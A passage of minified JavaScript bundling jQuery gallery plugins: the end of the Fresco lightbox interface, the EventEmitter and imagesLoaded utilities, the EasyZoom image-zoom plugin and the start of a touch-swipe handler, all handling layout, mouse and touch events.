a=1,r=1;(i=Fit.within(n,s)).width<n.width&&(a=n.width/i.width),i.height<n.height&&(r=n.height/i.height);var l=Math.max(a,r);1<l&&(i.width*=l,i.height*=l),$.each("width height".split(" "),function(e,t){i[t]=Math.round(i[t])})}else i=Fit.within(this._dimensions,s.width<n.width||s.height<n.height?{width:o,height:o}:n);var c=Math.round(.5*n.width-.5*i.width),u=Math.round(.5*n.height-.5*i.height);this.image.removeAttr("style").css($.extend({},i,{top:u,left:c}))}}}}});var UI={_modes:["fullclick","outside","inside"],_ui:!1,_validClickTargetSelector:[".fr-content-element",".fr-content",".fr-content > .fr-stroke",".fr-content > .fr-stroke .fr-stroke-color"].join(", "),initialize:function(e){$.each(this._modes,$.proxy(function(e,t){this[t].initialize()},this)),Window.element.addClass("fr-ui-inside-hidden fr-ui-fullclick-hidden")},set:function(e){this._ui&&(Window.element.removeClass("fr-window-ui-"+this._ui),Overlay.element.removeClass("fr-overlay-ui-"+this._ui)),Window.element.addClass("fr-window-ui-"+e),Overlay.element.addClass("fr-overlay-ui-"+e),this._enabled&&this._ui&&this._ui!=e&&(this[this._ui].disable(),this[e].enable(),UI[e].show()),this._ui=e},_onWindowResize:function(){Support.mobileTouch&&this.show()},enable:function(){$.each(this._modes,$.proxy(function(e,t){UI[t][t==this._ui?"enable":"disable"]()},this)),this._enabled=!0},disable:function(){$.each(this._modes,$.proxy(function(e,t){UI[t].disable()},this)),this._enabled=!1},adjustPrevNext:function(e,t){UI[this._ui].adjustPrevNext(e,t)},show:function(e,t){UI[this._ui].show(e,t)},hide:function(e,t){UI[this._ui].hide(e,t)},reset:function(){$.each(this._modes,$.proxy(function(e,t){UI[t].reset()},this))},update:function(){var e=Pages.page;e&&this.set(e._ui)}};return UI.fullclick={initialize:function(){this.build(),this._scrollLeft=-1},build:function(){Window._box.append(this._previous=$("<div>").addClass("fr-side fr-side-previous fr-side-previous-fullclick fr-toggle-ui").append($("<div>").addClass("fr-side-button").append($("<div>").addClass("fr-side-button-background")).append($("<div>").addClass("fr-side-button-icon")))).append(this._next=$("<div>").addClass("fr-side fr-side-next fr-side-next-fullclick fr-toggle-ui").append($("<div>").addClass("fr-side-button").append($("<div>").addClass("fr-side-button-background")).append($("<div>").addClass("fr-side-button-icon")))).append(this._close=$("<div>").addClass("fr-close fr-close-fullclick").append($("<div>").addClass("fr-close-background")).append($("<div>").addClass("fr-close-icon"))),Browser.IE&&Browser.IE<=7&&this._previous.add(this._next).add(this._close).hide(),this._close.on("click",$.proxy(function(e){e.preventDefault(),Window.hide()},this)),this._previous.on("click",$.proxy(function(e){Window.previous(),this._onMouseMove(e)},this)),this._next.on("click",$.proxy(function(e){Window.next(),this._onMouseMove(e)},this))},enable:function(){this.bind()},disable:function(){this.unbind()},reset:function(){Window.timers.clear("ui-fullclick"),this._x=-1,this._y=-1,this._scrollLeft=-1,this.resetPrevNext(),this._onMouseLeave()},resetPrevNext:function(){this._previous.add(this._next).stop(!0).removeAttr("style")},bind:function(){this._onMouseUpHandler||(this.unbind(),Window._pages.on("mouseup",".fr-container",this._onMouseUpHandler=$.proxy(this._onMouseUp,this)),Support.mobileTouch||(Window.element.on("mouseenter",this._showHandler=$.proxy(this.show,this)).on("mouseleave",this._hideHandler=$.proxy(this.hide,this)),Window.element.on("mousemove",this._mousemoveHandler=$.proxy(function(e){var t=e.pageX,i=e.pageY;this._hoveringSideButton||i==this._y&&t==this._x||(this._x=t,this._y=i,this.show(),this.startTimer())},this)),Window._pages.on("mousemove",".fr-container",this._onMouseMoveHandler=$.proxy(this._onMouseMove,this)).on("mouseleave",".fr-container",this._onMouseLeaveHandler=$.proxy(this._onMouseLeave,this)).on("mouseenter",".fr-container",this._onMouseEnterHandler=$.proxy(this._onMouseEnter,this)),Window.element.on("mouseenter",".fr-side",this._onSideMouseEnterHandler=$.proxy(this._onSideMouseEnter,this)).on("mouseleave",".fr-side",this._onSideMouseLeaveHandler=$.proxy(this._onSideMouseLeave,this)),$(window).on("scroll",this._onScrollHandler=$.proxy(this._onScroll,this))))},unbind:function(){this._onMouseUpHandler&&(Window._pages.off("mouseup",".fr-container",this._onMouseUpHandler),this._onMouseUpHandler=null,this._showHandler&&(Window.element.off("mouseenter",this._showHandler).off("mouseleave",this._hideHandler).off("mousemove",this._mousemoveHandler),Window._pages.off("mousemove",".fr-container",this._onMouseMoveHandler).off("mouseleave",".fr-container",this._onMouseLeaveHandler).off("mouseenter",".fr-container",this._onMouseEnterHandler),Window.element.off("mouseenter",".fr-side",this._onSideMouseEnterHandler).off("mouseleave",".fr-side",this._onSideMouseLeaveHandler),$(window).off("scroll",this._onScrollHandler),this._showHandler=null))},adjustPrevNext:function(e,t){var i=Pages.page;if(i){var n=Window.element.is(":visible");n||Window.element.show();var o=this._previous.attr("style");this._previous.removeAttr("style");var s=parseInt(this._previous.css("margin-top"));this._previous.attr({style:o}),n||Window.element.hide();var a=i._infoHeight||0,r=this._previous.add(this._next),l={"margin-top":s-.5*a},c="number"==$.type(t)?t:Pages.page&&Pages.page.view.options.effects.content.show||0;this.opening&&(c=0),r.stop(!0).animate(l,c,e),this._previous[(Window.mayPrevious()?"remove":"add")+"Class"]("fr-side-disabled"),this._next[(Window.mayNext()?"remove":"add")+"Class"]("fr-side-disabled"),r[(i._total<2?"add":"remove")+"Class"]("fr-side-hidden"),e&&e()}else e&&e()},_onScroll:function(){this._scrollLeft=$(window).scrollLeft()},_onMouseMove:function(e){if(!Support.mobileTouch){var t=this._getEventSide(e),i=_.String.capitalize(t),n=!!t&&Window["may"+i]();if(t!=this._hoveringSide||n!=this._mayClickHoveringSide)switch(this._hoveringSide=t,this._mayClickHoveringSide=n,Window._box[(n?"add":"remove")+"Class"]("fr-hovering-clickable"),t){case"previous":Window._box.addClass("fr-hovering-previous").removeClass("fr-hovering-next");break;case"next":Window._box.addClass("fr-hovering-next").removeClass("fr-hovering-previous")}}},_onMouseLeave:function(e){Window._box.removeClass("fr-hovering-clickable fr-hovering-previous fr-hovering-next"),this._hoveringSide=!1},_onMouseUp:function(e){if(!(1<e.which)){if(1==Pages.pages.length)return void Window.hide();var t=this._getEventSide(e);Window[t](),this._onMouseMove(e)}},_onMouseEnter:function(e){this._onMouseMove(e)},_getEventSide:function(e){return(-1<this._scrollLeft?this._scrollLeft:this._scrollLeft=$(window).scrollLeft(),e.pageX-Window._boxPosition.left-this._scrollLeft)<.5*Window._boxDimensions.width?"previous":"next"},_onSideMouseEnter:function(e){this._hoveringSideButton=!0,this._hoveringSide=this._getEventSide(e),this._mayClickHoveringSide=Window["may"+_.String.capitalize(this._hoveringSide)](),this.clearTimer()},_onSideMouseLeave:function(e){this._hoveringSideButton=!1,this._hoveringSide=!1,this._mayClickHoveringSide=!1,this.startTimer()},show:function(e){return this._visible?this.startTimer():(this._visible=!0,this.startTimer(),Window.element.addClass("fr-visible-fullclick-ui").removeClass("fr-hidden-fullclick-ui"),Browser.IE&&Browser.IE<=7&&this._previous.add(this._next).add(this._close).show()),void("function"==$.type(e)&&e())},hide:function(e){var t=Pages.page&&Pages.page.view.type;return!this._visible||t&&("youtube"==t||"vimeo"==t)||(this._visible=!1,Window.element.removeClass("fr-visible-fullclick-ui").addClass("fr-hidden-fullclick-ui")),void("function"==$.type(e)&&e())},clearTimer:function(){Support.mobileTouch||Window.timers.clear("ui-fullclick")},startTimer:function(){Support.mobileTouch||(this.clearTimer(),Window.timers.set("ui-fullclick",$.proxy(function(){this.hide()},this),Window.view?Window.view.options.uiDelay:0))}},UI.inside={initialize:function(){},enable:function(){this.bind()},disable:function(){this.unbind()},bind:function(){this._onMouseUpHandler||(this.unbind(),Window._pages.on("mouseup",".fr-content",this._onMouseUpHandler=$.proxy(this._onMouseUp,this)),Window._pages.on("click",".fr-content .fr-close",$.proxy(function(e){e.preventDefault(),Window.hide()},this)).on("click",".fr-content .fr-side-previous",$.proxy(function(e){Window.previous(),this._onMouseMove(e)},this)).on("click",".fr-content .fr-side-next",$.proxy(function(e){Window.next(),this._onMouseMove(e)},this)),Window.element.on("click",".fr-container, .fr-thumbnails, .fr-thumbnails-wrapper",this._delegateOverlayCloseHandler=$.proxy(this._delegateOverlayClose,this)),Support.mobileTouch||(Window.element.on("mouseenter",".fr-content",this._showHandler=$.proxy(this.show,this)).on("mouseleave",".fr-content",this._hideHandler=$.proxy(this.hide,this)),Window.element.on("mousemove",".fr-content",this._mousemoveHandler=$.proxy(function(e){var t=e.pageX,i=e.pageY;this._hoveringSideButton||i==this._y&&t==this._x||(this._x=t,this._y=i,this.show(),this.startTimer())},this)),Window._pages.on("mousemove",".fr-info, .fr-close",$.proxy(function(e){e.stopPropagation(),this._onMouseLeave(e)},this)),Window._pages.on("mousemove",".fr-info",$.proxy(function(e){this.clearTimer()},this)),Window._pages.on("mousemove",".fr-content",this._onMouseMoveHandler=$.proxy(this._onMouseMove,this)).on("mouseleave",".fr-content",this._onMouseLeaveHandler=$.proxy(this._onMouseLeave,this)).on("mouseenter",".fr-content",this._onMouseEnterHandler=$.proxy(this._onMouseEnter,this)),Window.element.on("mouseenter",".fr-side",this._onSideMouseEnterHandler=$.proxy(this._onSideMouseEnter,this)).on("mouseleave",".fr-side",this._onSideMouseLeaveHandler=$.proxy(this._onSideMouseLeave,this)),$(window).on("scroll",this._onScrollHandler=$.proxy(this._onScroll,this))))},unbind:function(){this._onMouseUpHandler&&(Window._pages.off("mouseup",".fr-content",this._onMouseUpHandler),this._onMouseUpHandler=null,Window._pages.off("click",".fr-content .fr-close").off("click",".fr-content .fr-side-previous").off("click",".fr-content .fr-side-next"),Window.element.off("click",".fr-container, .fr-thumbnails, .fr-thumbnails-wrapper",this._delegateOverlayCloseHandler),this._showHandler&&(Window.element.off("mouseenter",".fr-content",this._showHandler).off("mouseleave",".fr-content",this._hideHandler).off("mousemove",".fr-content",this._mousemoveHandler),Window._pages.off("mousemove",".fr-info, .fr-close"),Window._pages.off("mousemove",".fr-info"),Window._pages.off("mousemove",".fr-content-element",this._onMouseMoveHandler).off("mouseleave",".fr-content",this._onMouseLeaveHandler).off("mouseenter",".fr-content",this._onMouseEnterHandler),Window.element.off("mouseenter",".fr-side",this._onSideMouseEnterHandler).off("mouseleave",".fr-side",this._onSideMouseLeaveHandler),$(window).off("scroll",this._onScrollHandler),this._showHandler=null))},reset:function(){Window.timers.clear("ui-fullclick"),this._x=-1,this._y=-1,this._scrollLeft=-1,this._hoveringSide=!1,this._onMouseLeave()},adjustPrevNext:function(e){e&&e()},_onScroll:function(){this._scrollLeft=$(window).scrollLeft()},_delegateOverlayClose:function(e){var t=Pages.page;t&&t.view.options.overlay&&!t.view.options.overlay.close||$(e.target).is(".fr-container, .fr-thumbnails, .fr-thumbnails-wrapper")&&(e.preventDefault(),e.stopPropagation(),Window.hide())},_onMouseMove:function(e){if(!Support.mobileTouch){var t=this._getEventSide(e),i=_.String.capitalize(t),n=!!t&&Window["may"+i]();if((1==Pages.pages.length||Pages.page&&"close"==Pages.page.view.options.onClick)&&(t=!1),t!=this._hoveringSide||n!=this._mayClickHoveringSide)if(this._hoveringSide=t,this._mayClickHoveringSide=n,t)switch(Window._box[(n?"add":"remove")+"Class"]("fr-hovering-clickable"),t){case"previous":Window._box.addClass("fr-hovering-previous").removeClass("fr-hovering-next");break;case"next":Window._box.addClass("fr-hovering-next").removeClass("fr-hovering-previous")}else Window._box.removeClass("fr-hovering-clickable fr-hovering-previous fr-hovering-next")}},_onMouseLeave:function(e){Window._box.removeClass("fr-hovering-clickable fr-hovering-previous fr-hovering-next"),this._hoveringSide=!1},_onMouseUp:function(e){if(!(1<e.which)&&$(e.target).is(UI._validClickTargetSelector)){if(1==Pages.pages.length||Pages.page&&"close"==Pages.page.view.options.onClick)return void Window.hide();var t=this._getEventSide(e);Window[t](),this._onMouseMove(e)}},_onMouseEnter:function(e){this._onMouseMove(e)},_getEventSide:function(e){return(-1<this._scrollLeft?this._scrollLeft:this._scrollLeft=$(window).scrollLeft(),e.pageX-Window._boxPosition.left-this._scrollLeft)<.5*Window._boxDimensions.width?"previous":"next"},_onSideMouseEnter:function(e){this._hoveringSideButton=!0,this._hoveringSide=this._getEventSide(e),this._mayClickHoveringSide=Window["may"+_.String.capitalize(this._hoveringSide)](),this.clearTimer()},_onSideMouseLeave:function(e){this._hoveringSideButton=!1,this._hoveringSide=!1,this._mayClickHoveringSide=!1,this.startTimer()},show:function(e){return this._visible?this.startTimer():(this._visible=!0,this.startTimer(),Window.element.addClass("fr-visible-inside-ui").removeClass("fr-hidden-inside-ui")),void("function"==$.type(e)&&e())},hide:function(e){return this._visible&&(this._visible=!1,Window.element.removeClass("fr-visible-inside-ui").addClass("fr-hidden-inside-ui")),void("function"==$.type(e)&&e())},clearTimer:function(){Support.mobileTouch||Window.timers.clear("ui-inside")},startTimer:function(){Support.mobileTouch||(this.clearTimer(),Window.timers.set("ui-inside",$.proxy(function(){this.hide()},this),Window.view?Window.view.options.uiDelay:0))}},UI.outside={initialize:function(){this.build(),this._scrollLeft=-1},build:function(){Window._box.append(this._previous=$("<div>").addClass("fr-side fr-side-previous fr-side-previous-outside").append($("<div>").addClass("fr-side-button").append($("<div>").addClass("fr-side-button-background")).append($("<div>").addClass("fr-side-button-icon")))).append(this._next=$("<div>").addClass("fr-side fr-side-next fr-side-next-outside").append($("<div>").addClass("fr-side-button").append($("<div>").addClass("fr-side-button-background")).append($("<div>").addClass("fr-side-button-icon")))).append(this._close=$("<div>").addClass("fr-close fr-close-outside").append($("<div>").addClass("fr-close-background")).append($("<div>").addClass("fr-close-icon"))),Browser.IE&&Browser.IE<=7&&this._previous.add(this._next).add(this._close).hide(),this._close.on("click",$.proxy(function(e){e.preventDefault(),Window.hide()},this)),this._previous.on("click",$.proxy(function(e){Window.previous(),this._onMouseMove(e)},this)),this._next.on("click",$.proxy(function(e){Window.next(),this._onMouseMove(e)},this))},enable:function(){this.bind()},disable:function(){this.unbind()},reset:function(){Window.timers.clear("ui-outside"),this._x=-1,this._y=-1,this._scrollLeft=-1,this._onMouseLeave()},bind:function(){this._onMouseUpHandler||(this.unbind(),Window.element.on("mouseup",".fr-content",this._onMouseUpHandler=$.proxy(this._onMouseUp,this)),Window.element.on("click",".fr-container, .fr-thumbnails, .fr-thumbnails-wrapper",this._delegateOverlayCloseHandler=$.proxy(this._delegateOverlayClose,this)),Support.mobileTouch||(Window._pages.on("mousemove",".fr-content",this._onMouseMoveHandler=$.proxy(this._onMouseMove,this)).on("mouseleave",".fr-content",this._onMouseLeaveHandler=$.proxy(this._onMouseLeave,this)).on("mouseenter",".fr-content",this._onMouseEnterHandler=$.proxy(this._onMouseEnter,this)),Window.element.on("mouseenter",".fr-side",this._onSideMouseEnterHandler=$.proxy(this._onSideMouseEnter,this)).on("mouseleave",".fr-side",this._onSideMouseLeaveHandler=$.proxy(this._onSideMouseLeave,this)),$(window).on("scroll",this._onScrollHandler=$.proxy(this._onScroll,this))))},unbind:function(){this._onMouseUpHandler&&(Window.element.off("mouseup",".fr-content",this._onMouseUpHandler),this._onMouseUpHandler=null,Window.element.off("click",".fr-container, .fr-thumbnails, .fr-thumbnails-wrapper",this._delegateOverlayCloseHandler),this._onMouseMoveHandler&&(Window._pages.off("mousemove",".fr-content",this._onMouseMoveHandler).off("mouseleave",".fr-content",this._onMouseLeaveHandler).off("mouseenter",".fr-content",this._onMouseEnterHandler),Window.element.off("mouseenter",".fr-side",this._onSideMouseEnterHandler).off("mouseleave",".fr-side",this._onSideMouseLeaveHandler),$(window).off("scroll",this._onScrollHandler),this._onMouseMoveHandler=null))},adjustPrevNext:function(e,t){var i=Pages.page;if(i){var n=this._previous.add(this._next);this._previous[(Window.mayPrevious()?"remove":"add")+"Class"]("fr-side-disabled"),this._next[(Window.mayNext()?"remove":"add")+"Class"]("fr-side-disabled"),n[(i._total<2?"add":"remove")+"Class"]("fr-side-hidden"),e&&e()}else e&&e()},_onScroll:function(){this._scrollLeft=$(window).scrollLeft()},_delegateOverlayClose:function(e){var t=Pages.page;t&&t.view.options.overlay&&!t.view.options.overlay.close||$(e.target).is(".fr-container, .fr-thumbnails, .fr-thumbnails-wrapper")&&(e.preventDefault(),e.stopPropagation(),Window.hide())},_onMouseMove:function(e){if(!Support.mobileTouch){var t=this._getEventSide(e),i=_.String.capitalize(t),n=!!t&&Window["may"+i]();if((1==Pages.pages.length||Pages.page&&"close"==Pages.page.view.options.onClick)&&(t=!1),t!=this._hoveringSide||n!=this._mayClickHoveringSide)if(this._hoveringSide=t,this._mayClickHoveringSide=n,t)switch(Window._box[(n?"add":"remove")+"Class"]("fr-hovering-clickable"),t){case"previous":Window._box.addClass("fr-hovering-previous").removeClass("fr-hovering-next");break;case"next":Window._box.addClass("fr-hovering-next").removeClass("fr-hovering-previous")}else Window._box.removeClass("fr-hovering-clickable fr-hovering-previous fr-hovering-next")}},_onMouseLeave:function(e){Window._box.removeClass("fr-hovering-clickable fr-hovering-previous fr-hovering-next"),this._hoveringSide=!1},_onMouseUp:function(e){if(!(1<e.which)&&$(e.target).is(UI._validClickTargetSelector)){if(1==Pages.pages.length||Pages.page&&"close"==Pages.page.view.options.onClick)return void Window.hide();var t=this._getEventSide(e);Window[t](),this._onMouseMove(e)}},_onMouseEnter:function(e){this._onMouseMove(e)},_getEventSide:function(e){return(-1<this._scrollLeft?this._scrollLeft:this._scrollLeft=$(window).scrollLeft(),e.pageX-Window._boxPosition.left-this._scrollLeft)<.5*Window._boxDimensions.width?"previous":"next"},show:function(){Browser.IE&&Browser.IE<=7&&this._previous.add(this._next).add(this._close).show()},hide:function(){},_onSideMouseEnter:function(e){this._hoveringSideButton=!0,this._hoveringSide=this._getEventSide(e),this._mayClickHoveringSide=Window["may"+_.String.capitalize(this._hoveringSide)]()},_onSideMouseLeave:function(e){this._hoveringSideButton=!1,this._hoveringSide=!1,this._mayClickHoveringSide=!1},clearTimer:function(){}},$(document).ready(function(e){_Fresco.initialize()}),Fresco}),function(){function e(){}function s(e,t){for(var i=e.length;i--;)if(e[i].listener===t)return i;return-1}function t(e){return function(){return this[e].apply(this,arguments)}}var i=e.prototype,n=this,o=n.EventEmitter;i.getListeners=function(e){var t,i,n=this._getEvents();if("object"==typeof e)for(i in t={},n)n.hasOwnProperty(i)&&e.test(i)&&(t[i]=n[i]);else t=n[e]||(n[e]=[]);return t},i.flattenListeners=function(e){var t,i=[];for(t=0;t<e.length;t+=1)i.push(e[t].listener);return i},i.getListenersAsObject=function(e){var t,i=this.getListeners(e);return i instanceof Array&&((t={})[e]=i),t||i},i.addListener=function(e,t){var i,n=this.getListenersAsObject(e),o="object"==typeof t;for(i in n)n.hasOwnProperty(i)&&-1===s(n[i],t)&&n[i].push(o?t:{listener:t,once:!1});return this},i.on=t("addListener"),i.addOnceListener=function(e,t){return this.addListener(e,{listener:t,once:!0})},i.once=t("addOnceListener"),i.defineEvent=function(e){return this.getListeners(e),this},i.defineEvents=function(e){for(var t=0;t<e.length;t+=1)this.defineEvent(e[t]);return this},i.removeListener=function(e,t){var i,n,o=this.getListenersAsObject(e);for(n in o)o.hasOwnProperty(n)&&-1!==(i=s(o[n],t))&&o[n].splice(i,1);return this},i.off=t("removeListener"),i.addListeners=function(e,t){return this.manipulateListeners(!1,e,t)},i.removeListeners=function(e,t){return this.manipulateListeners(!0,e,t)},i.manipulateListeners=function(e,t,i){var n,o,s=e?this.removeListener:this.addListener,a=e?this.removeListeners:this.addListeners;if("object"!=typeof t||t instanceof RegExp)for(n=i.length;n--;)s.call(this,t,i[n]);else for(n in t)t.hasOwnProperty(n)&&(o=t[n])&&("function"==typeof o?s.call(this,n,o):a.call(this,n,o));return this},i.removeEvent=function(e){var t,i=typeof e,n=this._getEvents();if("string"===i)delete n[e];else if("object"===i)for(t in n)n.hasOwnProperty(t)&&e.test(t)&&delete n[t];else delete this._events;return this},i.removeAllListeners=t("removeEvent"),i.emitEvent=function(e,t){var i,n,o,s=this.getListenersAsObject(e);for(o in s)if(s.hasOwnProperty(o))for(n=s[o].length;n--;)!0===(i=s[o][n]).once&&this.removeListener(e,i.listener),i.listener.apply(this,t||[])===this._getOnceReturnValue()&&this.removeListener(e,i.listener);return this},i.trigger=t("emitEvent"),i.emit=function(e){var t=Array.prototype.slice.call(arguments,1);return this.emitEvent(e,t)},i.setOnceReturnValue=function(e){return this._onceReturnValue=e,this},i._getOnceReturnValue=function(){return!this.hasOwnProperty("_onceReturnValue")||this._onceReturnValue},i._getEvents=function(){return this._events||(this._events={})},e.noConflict=function(){return n.EventEmitter=o,e},"function"==typeof define&&define.amd?define("eventEmitter/EventEmitter",[],function(){return e}):"object"==typeof module&&module.exports?module.exports=e:this.EventEmitter=e}.call(this),function(i){function n(e){var t=i.event;return t.target=t.target||t.srcElement||e,t}var e=document.documentElement,t=function(){};e.addEventListener?t=function(e,t,i){e.addEventListener(t,i,!1)}:e.attachEvent&&(t=function(t,e,i){t[e+i]=i.handleEvent?function(){var e=n(t);i.handleEvent.call(i,e)}:function(){var e=n(t);i.call(t,e)},t.attachEvent("on"+e,t[e+i])});var o=function(){};e.removeEventListener?o=function(e,t,i){e.removeEventListener(t,i,!1)}:e.detachEvent&&(o=function(t,i,n){t.detachEvent("on"+i,t[i+n]);try{delete t[i+n]}catch(e){t[i+n]=void 0}});var s={bind:t,unbind:o};"function"==typeof define&&define.amd?define("eventie/eventie",s):i.eventie=s}(this),function(i,n){"function"==typeof define&&define.amd?define(["eventEmitter/EventEmitter","eventie/eventie"],function(e,t){return n(i,e,t)}):"object"==typeof exports?module.exports=n(i,require("eventEmitter"),require("eventie")):i.imagesLoaded=n(i,i.EventEmitter,i.eventie)}(this,function(e,t,i){function o(e,t){for(var i in t)e[i]=t[i];return e}function s(e){var t,i=[];if(t=e,"[object Array]"===d.call(t))i=e;else if("number"==typeof e.length)for(var n=0,o=e.length;n<o;n++)i.push(e[n]);else i.push(e);return i}function a(e,t,i){if(!(this instanceof a))return new a(e,t);"string"==typeof e&&(e=document.querySelectorAll(e)),this.elements=s(e),this.options=o({},this.options),"function"==typeof t?i=t:o(this.options,t),i&&this.on("always",i),this.getImages(),l&&(this.jqDeferred=new l.Deferred);var n=this;setTimeout(function(){n.check()})}function n(e){this.img=e}function r(e){this.src=e,h[e]=this}var l=e.jQuery,c=e.console,u=void 0!==c,d=Object.prototype.toString;a.prototype=new t,a.prototype.options={},a.prototype.getImages=function(){this.images=[];for(var e=0,t=this.elements.length;e<t;e++){var i=this.elements[e];"IMG"===i.nodeName&&this.addImage(i);for(var n=i.querySelectorAll("img"),o=0,s=n.length;o<s;o++){var a=n[o];this.addImage(a)}}},a.prototype.addImage=function(e){var t=new n(e);this.images.push(t)},a.prototype.check=function(){function e(e,t){return i.options.debug&&u&&c.log("confirm",e,t),i.progress(e),++n===o&&i.complete(),!0}var i=this,n=0,o=this.images.length;if(this.hasAnyBroken=!1,o)for(var t=0;t<o;t++){var s=this.images[t];s.on("confirm",e),s.check()}else this.complete()},a.prototype.progress=function(e){this.hasAnyBroken=this.hasAnyBroken||!e.isLoaded;var t=this;setTimeout(function(){t.emit("progress",t,e),t.jqDeferred&&t.jqDeferred.notify&&t.jqDeferred.notify(t,e)})},a.prototype.complete=function(){var t=this.hasAnyBroken?"fail":"done";this.isComplete=!0;var i=this;setTimeout(function(){if(i.emit(t,i),i.emit("always",i),i.jqDeferred){var e=i.hasAnyBroken?"reject":"resolve";i.jqDeferred[e](i)}})},l&&(l.fn.imagesLoaded=function(e,t){return new a(this,e,t).jqDeferred.promise(l(this))}),n.prototype=new t,n.prototype.check=function(){var e=h[this.img.src]||new r(this.img.src);if(e.isConfirmed)this.confirm(e.isLoaded,"cached was confirmed");else if(this.img.complete&&void 0!==this.img.naturalWidth)this.confirm(0!==this.img.naturalWidth,"naturalWidth");else{var i=this;e.on("confirm",function(e,t){return i.confirm(e.isLoaded,t),!0}),e.check()}},n.prototype.confirm=function(e,t){this.isLoaded=e,this.emit("confirm",this,t)};var h={};return r.prototype=new t,r.prototype.check=function(){if(!this.isChecked){var e=new Image;i.bind(e,"load",this),i.bind(e,"error",this),e.src=this.src,this.isChecked=!0}},r.prototype.handleEvent=function(e){var t="on"+e.type;this[t]&&this[t](e)},r.prototype.onload=function(e){this.confirm(!0,"onload"),this.unbindProxyEvents(e)},r.prototype.onerror=function(e){this.confirm(!1,"onerror"),this.unbindProxyEvents(e)},r.prototype.confirm=function(e,t){this.isConfirmed=!0,this.isLoaded=e,this.emit("confirm",this,t)},r.prototype.unbindProxyEvents=function(e){i.unbind(e.target,"load",this),i.unbind(e.target,"error",this)},a}),function(n){"use strict";function i(e,t){this.$target=n(e),this.opts=n.extend({},o,t,this.$target.data()),void 0===this.isOpen&&this._init()}var c,u,d,h,p,f,o={loadingNotice:"Loading image",errorNotice:"The image could not be loaded",errorDuration:2500,linkAttribute:"href",preventClicks:!0,beforeShow:n.noop,beforeHide:n.noop,onShow:n.noop,onHide:n.noop,onMove:n.noop};i.prototype._init=function(){this.$link=this.$target.find("a"),this.$image=this.$target.find("img"),this.$flyout=n('<div class="easyzoom-flyout" />'),this.$notice=n('<div class="easyzoom-notice" />'),this.$target.on({"mousemove.easyzoom touchmove.easyzoom":n.proxy(this._onMove,this),"mouseleave.easyzoom touchend.easyzoom":n.proxy(this._onLeave,this),"mouseenter.easyzoom touchstart.easyzoom":n.proxy(this._onEnter,this)}),this.opts.preventClicks&&this.$target.on("click.easyzoom",function(e){e.preventDefault()})},i.prototype.show=function(e,t){var i,n,o,s,a=this;if(!1!==this.opts.beforeShow.call(this)){if(!this.isReady)return this._loadImage(this.$link.attr(this.opts.linkAttribute),function(){(a.isMouseOver||!t)&&a.show(e)});this.$target.append(this.$flyout),i=this.$target.width(),n=this.$target.height(),o=this.$flyout.width(),s=this.$flyout.height(),c=this.$zoom.width()-o,u=this.$zoom.height()-s,c<0&&(c=0),u<0&&(u=0),d=c/i,h=u/n,this.isOpen=!0,this.opts.onShow.call(this),e&&this._move(e)}},i.prototype._onEnter=function(e){var t=e.originalEvent.touches;this.isMouseOver=!0,t&&1!=t.length||(e.preventDefault(),this.show(e,!0))},i.prototype._onMove=function(e){this.isOpen&&(e.preventDefault(),this._move(e))},i.prototype._onLeave=function(){this.isMouseOver=!1,this.isOpen&&this.hide()},i.prototype._onLoad=function(e){e.currentTarget.width&&(this.isReady=!0,this.$notice.detach(),this.$flyout.html(this.$zoom),this.$target.removeClass("is-loading").addClass("is-ready"),e.data.call&&e.data())},i.prototype._onError=function(){var e=this;this.$notice.text(this.opts.errorNotice),this.$target.removeClass("is-loading").addClass("is-error"),this.detachNotice=setTimeout(function(){e.$notice.detach(),e.detachNotice=null},this.opts.errorDuration)},i.prototype._loadImage=function(e,t){var i=new Image;this.$target.addClass("is-loading").append(this.$notice.text(this.opts.loadingNotice)),this.$zoom=n(i).on("error",n.proxy(this._onError,this)).on("load",t,n.proxy(this._onLoad,this)),i.style.position="absolute",i.src=e},i.prototype._move=function(e){if(0===e.type.indexOf("touch")){var t=e.touches||e.originalEvent.touches;p=t[0].pageX,f=t[0].pageY}else p=e.pageX||p,f=e.pageY||f;var i=this.$target.offset(),n=f-i.top,o=p-i.left,s=Math.ceil(n*h),a=Math.ceil(o*d);if(a<0||s<0||c<a||u<s)this.hide();else{var r=-1*s,l=-1*a;this.$zoom.css({top:r,left:l}),this.opts.onMove.call(this,r,l)}},i.prototype.hide=function(){this.isOpen&&!1!==this.opts.beforeHide.call(this)&&(this.$flyout.detach(),this.isOpen=!1,this.opts.onHide.call(this))},i.prototype.swap=function(e,t,i){this.hide(),this.isReady=!1,this.detachNotice&&clearTimeout(this.detachNotice),this.$notice.parent().length&&this.$notice.detach(),this.$target.removeClass("is-loading is-ready is-error"),this.$image.attr({src:e,srcset:n.isArray(i)?i.join():i}),this.$link.attr(this.opts.linkAttribute,t)},i.prototype.teardown=function(){this.hide(),this.$target.off(".easyzoom").removeClass("is-loading is-ready is-error"),this.detachNotice&&clearTimeout(this.detachNotice),delete this.$link,delete this.$zoom,delete this.$image,delete this.$notice,delete this.$flyout,delete this.isOpen,delete this.isReady},n.fn.easyZoom=function(t){return this.each(function(){var e=n.data(this,"easyZoom");e?void 0===e.isOpen&&e._init():n.data(this,"easyZoom",new i(this,t))})},"function"==typeof define&&define.amd?define(function(){return i}):"undefined"!=typeof module&&module.exports&&(module.exports=i)}(jQuery),function(e){"function"==typeof define&&define.amd&&define.amd.jQuery?define(["jquery"],e):e(jQuery)}(function(oe){function n(i){return!i||void 0!==i.allowPageScroll||void 0===i.swipe&&void 0===i.swipeStatus||(i.allowPageScroll=de),void 0!==i.click&&void 0===i.tap&&(i.tap=i.click),i||(i={}),i=oe.extend({},oe.fn.swipe.defaults,i),this.each(function(){var e=oe(this),t=e.data(Se);t||(t=new function(e,y){function t(e){if(!0!==U.data(Se+"_intouch")&&!(0<oe(e.target).closest(y.excludedElements,U).length)){var t,i,n=e.originalEvent?e.originalEvent:e,o=Te?n.touches[0]:n;return X=xe,Te?Q=n.touches.length:e.preventDefault(),Y=W=null,N=1,V=B=q=F=R=0,K=function(){for(var e=[],t=0;t<=5;t++)e.push({start:{x:0,y:0},end:{x:0,y:0},identifier:0});return e}(),(i={})[se]=E(se),i[ae]=E(ae),i[re]=E(re),i[le]=E(le),G=i,C(),!Te||Q===y.fingers||y.fingers===be||_()?(T(0,o),Z=I(),2==Q&&(T(1,n.touches[1]),q=B=P(K[0].start,K[1].start)),(y.swipeStatus||y.pinchStatus)&&(t=b(n,X))):t=!1,!1===t?(b(n,X=ke),t):(k(!0),null)}}function i(e){var t=e.originalEvent?e.originalEvent:e;if(X!==$e&&X!==ke&&!$()){var 